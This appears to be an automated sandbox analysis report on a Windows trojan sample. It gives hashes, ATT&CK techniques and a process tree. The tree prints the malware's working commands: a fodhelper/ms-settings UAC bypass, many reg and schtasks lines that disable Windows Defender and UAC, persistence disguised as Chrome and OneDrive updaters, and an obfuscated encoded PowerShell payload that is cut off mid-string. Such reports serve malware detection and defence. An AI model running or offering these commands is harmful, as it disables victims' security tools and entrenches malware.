14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67

Analysis

max time kernel
68s
max time network
104s
platform
windows10_x64
resource
win10v20201028
submitted
25-02-2021 00:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe
Size

257KB
MD5

f56e80ea9e01670963449ac451af7510
SHA1

7bf3a3bda2c0d6ef24dabd49c18d6da70957517f
SHA256

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67
SHA512

53200aef8c9635c1069e0d364404172c52e1a6e9a6185c61b383e94dcf761e8ded5663982cf67d768c87879346862b07e0d7a7161b442e5b3234b553543067ab

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Executes dropped EXE 2 IoCs

Processes:

Load.exerun.exe

pid process

808 Load.exe
1008 run.exe

pid	process
808	Load.exe
1008	run.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\#OneDriveUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\run.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2912 schtasks.exe

pid	process
2912	schtasks.exe

Modifies registry class 11 IoCs

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Load.exe"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\ms-settings\shell	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

3556 reg.exe
204 reg.exe
3480 reg.exe
3224 reg.exe

pid	process
3556	reg.exe
204	reg.exe
3480	reg.exe
3224	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
3680	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	984	WMIC.exe
Token: SeSecurityPrivilege	984	WMIC.exe
Token: SeTakeOwnershipPrivilege	984	WMIC.exe
Token: SeLoadDriverPrivilege	984	WMIC.exe
Token: SeSystemProfilePrivilege	984	WMIC.exe
Token: SeSystemtimePrivilege	984	WMIC.exe
Token: SeProfSingleProcessPrivilege	984	WMIC.exe
Token: SeIncBasePriorityPrivilege	984	WMIC.exe
Token: SeCreatePagefilePrivilege	984	WMIC.exe
Token: SeBackupPrivilege	984	WMIC.exe
Token: SeRestorePrivilege	984	WMIC.exe
Token: SeShutdownPrivilege	984	WMIC.exe
Token: SeDebugPrivilege	984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	984	WMIC.exe
Token: SeRemoteShutdownPrivilege	984	WMIC.exe
Token: SeUndockPrivilege	984	WMIC.exe
Token: SeManageVolumePrivilege	984	WMIC.exe
Token: 33	984	WMIC.exe
Token: 34	984	WMIC.exe
Token: 35	984	WMIC.exe
Token: 36	984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	984	WMIC.exe
Token: SeSecurityPrivilege	984	WMIC.exe
Token: SeTakeOwnershipPrivilege	984	WMIC.exe
Token: SeLoadDriverPrivilege	984	WMIC.exe
Token: SeSystemProfilePrivilege	984	WMIC.exe
Token: SeSystemtimePrivilege	984	WMIC.exe
Token: SeProfSingleProcessPrivilege	984	WMIC.exe
Token: SeIncBasePriorityPrivilege	984	WMIC.exe
Token: SeCreatePagefilePrivilege	984	WMIC.exe
Token: SeBackupPrivilege	984	WMIC.exe
Token: SeRestorePrivilege	984	WMIC.exe
Token: SeShutdownPrivilege	984	WMIC.exe
Token: SeDebugPrivilege	984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	984	WMIC.exe
Token: SeRemoteShutdownPrivilege	984	WMIC.exe
Token: SeUndockPrivilege	984	WMIC.exe
Token: SeManageVolumePrivilege	984	WMIC.exe
Token: 33	984	WMIC.exe
Token: 34	984	WMIC.exe
Token: 35	984	WMIC.exe
Token: 36	984	WMIC.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeIncreaseQuotaPrivilege	1124	powershell.exe
Token: SeSecurityPrivilege	1124	powershell.exe
Token: SeTakeOwnershipPrivilege	1124	powershell.exe
Token: SeLoadDriverPrivilege	1124	powershell.exe
Token: SeSystemProfilePrivilege	1124	powershell.exe
Token: SeSystemtimePrivilege	1124	powershell.exe
Token: SeProfSingleProcessPrivilege	1124	powershell.exe
Token: SeIncBasePriorityPrivilege	1124	powershell.exe
Token: SeCreatePagefilePrivilege	1124	powershell.exe
Token: SeBackupPrivilege	1124	powershell.exe
Token: SeRestorePrivilege	1124	powershell.exe
Token: SeShutdownPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeSystemEnvironmentPrivilege	1124	powershell.exe
Token: SeRemoteShutdownPrivilege	1124	powershell.exe
Token: SeUndockPrivilege	1124	powershell.exe
Token: SeManageVolumePrivilege	1124	powershell.exe
Token: 33	1124	powershell.exe
Token: 34	1124	powershell.exe
Token: 35	1124	powershell.exe
Token: 36	1124	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.execmd.execmd.exefodhelper.exeLoad.execmd.exe

description	pid	process	target process
PID 1144 wrote to memory of 3084	1144	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 1144 wrote to memory of 3084	1144	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 3084 wrote to memory of 400	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 400	3084	cmd.exe	cmd.exe
PID 400 wrote to memory of 984	400	cmd.exe	WMIC.exe
PID 400 wrote to memory of 984	400	cmd.exe	WMIC.exe
PID 3084 wrote to memory of 2216	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 2216	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 212	3084	cmd.exe	find.exe
PID 3084 wrote to memory of 212	3084	cmd.exe	find.exe
PID 3084 wrote to memory of 204	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 204	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3480	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3480	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 1016	3084	cmd.exe	fodhelper.exe
PID 3084 wrote to memory of 1016	3084	cmd.exe	fodhelper.exe
PID 1016 wrote to memory of 808	1016	fodhelper.exe	Load.exe
PID 1016 wrote to memory of 808	1016	fodhelper.exe	Load.exe
PID 1016 wrote to memory of 808	1016	fodhelper.exe	Load.exe
PID 3084 wrote to memory of 3224	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3224	3084	cmd.exe	reg.exe
PID 808 wrote to memory of 904	808	Load.exe	cmd.exe
PID 808 wrote to memory of 904	808	Load.exe	cmd.exe
PID 904 wrote to memory of 3780	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3780	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3712	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3712	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3676	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3676	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3920	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3920	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2820	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2820	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2824	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2824	904	cmd.exe	reg.exe
PID 904 wrote to memory of 400	904	cmd.exe	reg.exe
PID 904 wrote to memory of 400	904	cmd.exe	reg.exe
PID 904 wrote to memory of 208	904	cmd.exe	reg.exe
PID 904 wrote to memory of 208	904	cmd.exe	reg.exe
PID 904 wrote to memory of 504	904	cmd.exe	reg.exe
PID 904 wrote to memory of 504	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3480	904	cmd.exe	reg.exe
PID 904 wrote to memory of 3480	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2704	904	cmd.exe	reg.exe
PID 904 wrote to memory of 2704	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1984	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1984	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1452	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1452	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1176	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1176	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1404	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1404	904	cmd.exe	reg.exe
PID 904 wrote to memory of 652	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 652	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 1296	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 1296	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 2256	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 2256	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 3084	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 3084	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 3808	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 3808	904	cmd.exe	schtasks.exe
PID 904 wrote to memory of 2432	904	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe
"C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62A7.tmp\62A8.tmp\62A9.bat C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get caption,version /format:csv
3⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\System32\Wbem\WMIC.exe
wmic os get caption,version /format:csv
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Microsoft Windows 10 Pro"
3⤵
PID:2216

C:\Windows\system32\find.exe
find " 10 "
3⤵
PID:212

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
3⤵
- Modifies registry class
- Modifies registry key
PID:204

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "C:\Users\Admin\AppData\Roaming\Load.exe" /f
3⤵
- Modifies registry class
- Modifies registry key
PID:3480

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Users\Admin\AppData\Roaming\Load.exe
"C:\Users\Admin\AppData\Roaming\Load.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\668F.tmp\6690.tmp\6691.bat C:\Users\Admin\AppData\Roaming\Load.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
6⤵
PID:3780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
6⤵
PID:3712

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
6⤵
PID:3676

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
6⤵
PID:3920

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
6⤵
PID:2820

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
6⤵
PID:2824

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
6⤵
PID:400

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
6⤵
PID:208

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
6⤵
PID:504

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
6⤵
PID:3480

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
6⤵
PID:2704

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
6⤵
PID:1984

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
6⤵
PID:1452

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
6⤵
PID:1176

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
6⤵
PID:1404

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
6⤵
PID:652

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
6⤵
PID:1296

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
6⤵
PID:2256

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
6⤵
PID:3084

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
6⤵
PID:3808

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
6⤵
PID:2432

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
6⤵
PID:3768

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
6⤵
PID:992

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:360

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:684

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:2716

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:400

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:212

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:504

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:2012

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:2768

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:1984

C:\Windows\system32\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
- Modifies registry key
PID:3556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\System32" -force
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdater /TR 'C:\Users\Admin\AppData\Roaming\run.exe' /SC minute /mo 60}
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1016

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN AutomaticChromeUpdater /TR C:\Users\Admin\AppData\Roaming\run.exe /SC minute /mo 60
7⤵
- Creates scheduled task(s)
PID:2912

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDriveUpdater" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\run.exe" /f
6⤵
- Adds Run key to start application
PID:1452

C:\Users\Admin\AppData\Roaming\run.exe
C:\Users\Admin\AppData\Roaming\run.exe
6⤵
- Executes dropped EXE
PID:1008

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7AA5.tmp\7AA6.bat C:\Users\Admin\AppData\Roaming\run.exe"
7⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noP -sta -w 1 -enc IAAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZQBUACcALAAnAFMAJwApACAAIABOAEUAYgAgACAAKAAgACAAWwB0AHkAcABlAF0AKAAiAHsANAB9AHsAMwB9AHsAMQAzAH0AewA4AH0AewA5AH0AewA1AH0AewA2AH0AewAxADEAfQB7ADIAfQB7ADEAMAB9AHsAMAB9AHsAMQB9AHsAMQAyAH0AewA3AH0AIgAtAEYAJwBTACcALAAnAHQAUgBJAE4ARwAnACwAJwBkAGkAYwBUAGkATwBOAEEAUgB5ACcALAAnAGwAJwAsACcAQwBvACcALAAnAHMALgAnACwAJwBnAEUATgBFAHIAJwAsACcAdAAnACwAJwBUAEkAbwAnACwAJwBuACcALAAnAFsAJwAsACcAaQBDAC4AJwAsACcALABzAFkAcwB0AEUATQAuAE8AYgBKAEUAQwAnACwAJwBMAGUAYwAnACkAIAApACAAIAA7ACAAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAVABFAG0AJwAsACcASQAnACwAJwBTAGUAVAAtACcAKQAgACgAIgBWACIAKwAiAEEAUgBJACIAKwAiAGEAYgBsAGUAOgBvADgAMgBqACIAKQAgACAAKABbAFQAeQBQAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAEYAIAAnAHMAQwByACcALAAnAEkAUABUAGIATABPACcALAAnAGMASwAnACkAIAAgACkAOwAgACAALgAoACcAUwB2ACcAKQAgACAAMQBpAFEANgAgACgAIABbAFQAeQBwAEUAXQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBSAEUAJwAsACcARgAnACkAKQAgADsAIAAgACAAJgAoACIAewAzAH0AewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAFIAaQBhAEIAJwAsACcAYQAnACwAJwBMAGUAJwAsACcAcwBlAHQALQB2ACcAKQAgADAARQBTADYAIAAoACAAIABbAFQAWQBwAEUAXQAoACIAewAzAH0AewA1AH0AewAxAH0AewA2AH0AewAwAH0AewA3AH0AewAyAH0AewA4AH0AewA0AH0AIgAtAEYAJwAuAG4AZQB0AC4AJwAsACcARQAnACwAJwBDAGUAUABPAGkAbgB0AE0AYQBOAEEARwAnACwAJwBzAFkAUwAnACwAJwBSACcALAAnAHQAJwAsACcAbQAnACwAJwBTAEUAcgBWAGkAJwAsACcAZQAnACkAKQAgACAAOwAgACAAJAAzAGIAMgAgACAAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGcAJwAsACcAbgBjAG8ARABJAG4AJwAsACcAdABFAFgAdAAuAEUAJwApACAAOwAgACAAIAAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcARQAnACwAJwBTACcALAAnAFQALQBWAGEAUgBJAEEAQgBMAGUAJwApACAATABqAG0AaQBxADYAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBDAG8AJwAsACcATgB2AGUAUgB0ACcAKQApACAAIAA7ACAAIAAgAC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBhAEIATABFACcALAAnAFMAZQBUAC0AVgAnACwAJwBBAHIAaQAnACkAIAAgACgAJwBSAGgAbAAnACsAJwBOAEUAJwArACcAQwAnACkAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiACAALQBmACAAJwBVACcALAAnAC4ATgBFACcALAAnAHQALgBXAGUAYgByAEUAcQAnACwAJwBzAFkAcwB0AGUATQAnACwAJwBlAFMAdAAnACkAIAApACAAOwAgACAAIAAgACQATwA2AEEAOABsAD0AIABbAFQAeQBwAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAwAH0AewA2AH0AewAxAH0AewAzAH0AIgAgAC0AZgAnAC4AbgBFAHQALgBjAFIAJwAsACcARQAnACwAJwBTAHkAJwAsACcAbgBUAEkAYQBMAGMAYQBjAGgAZQAnACwAJwBTAFQAJwAsACcAZQBtACcALAAnAEUARAAnACkAOwAgACAAIAAkAGkAYwA5ADcAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA1AH0AewAyAH0AewA0AH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAdAAnACwAJwAuAGUATgBDAE8AZAAnACwAJwBzACcALAAnAEkAbgBnACcALAAnAFQARQBtAC4AVABlAHgAJwAsACcAUwBZACcAKQAgACAAOwBJAGYAKAAkAHsAcABzAGAAVgBlAFIAYABzAEkATwBOAHQAQQBCAEwARQB9AC4AIgBwAGAAcwBWAGUAUgBgAHMASQBvAE4AIgAuACIATQBBAGAAagBPAHIAIgAgAC0AZwBlACAAMwApAHsAJAB7ADIAQwBgADgAYABlADEAfQA9ACAAKAAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBBACcALAAnAHYAYQBSAGkAJwAsACcAYgBMAGUAJwApACAAIAAoACIAMQBJAFEAIgArACIANgAiACkAKQAuAFYAQQBMAHUARQAuACIAQQBzAGAAUwBgAEUAbQBiAEwAWQAiAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdABUAHkAcABlACcALAAnAEcARQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADAAfQB7ADEAfQB7ADcAfQB7ADYAfQB7ADQAfQAiAC0AZgAgACcAbgB0AC4AQQB1AHQAJwAsACcAbwBtAGEAdABpACcALAAnAFMAJwAsACcAZwBlAG0AZQAnACwAJwBzACcALAAnAHkAcwB0ACcALAAnAHQAaQBsACcALAAnAG8AbgAuAFUAJwAsACcAZQBtAC4ATQBhAG4AYQAnACkAKQAuACIARwBlAFQARgBJAGUAYABsAGQAIgAoACgAIgB7ADEAfQB7ADQAfQB7ADUAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADIAfQB7ADMAfQAiACAALQBmACcAdABpACcALAAnAGMAJwAsACcAZwAnACwAJwBzACcALAAnAGEAYwBoACcALAAnAGUAZAAnACwAJwBuACcALAAnAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAAnACkALAAnAE4AJwArACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAGMAJwAsACcAbwAnACwAJwBuAFAAdQAnACwAJwBiAGwAaQBjACwAUwB0AGEAdABpACcAKQApADsASQBGACgAJAB7ADIAYwBgADgARQAxAH0AKQB7ACQAewBDAEEAYAA0AGAANwA4AH0APQAkAHsAMgBgAGMAOABgAGUAMQB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBlACcALAAnAEcAZQBUAFYAJwAsACcAQQBsAHUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAbgB1AGAAbABMAH0AKQA7AEkARgAoACQAewBDAGAAQQA0AGAANwA4AH0AWwAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAIAAnAFMAYwByACcALAAnAGkAcAAnACwAJwB0AEIAJwApACsAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG4AZwAnACwAJwBvAGcAZwBpACcALAAnAGwAbwBjAGsATAAnACkAXQApAHsAJAB7AEMAQQA0AGAANwA4AH0AWwAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHAAJwAsACcAUwBjAHIAaQAnACwAJwB0AEIAJwApACsAKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACcAaQAnACwAJwBsAG8AYwAnACwAJwBuAGcAJwAsACcAawBMAG8AZwBnACcAKQBdAFsAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACAAJwBuACcALAAnAEIAJwAsACcARQAnACwAJwBhAGIAbABlAFMAYwByAGkAcAB0ACcAKQArACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBnACcALAAnAGcAaQBuACcALAAnAGwAbwBjAGsATABvAGcAJwApAF0APQAwADsAJAB7AEMAYABBADQANwA4AH0AWwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAGMAcgBpACcALAAnAHAAdABCACcAKQArACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiAC0AZgAgACcAbwBjAGsATAAnACwAJwBnACcALAAnAGwAJwAsACcAbwBnAGcAaQBuACcAKQBdAFsAKAAiAHsANAB9AHsAMwB9AHsAM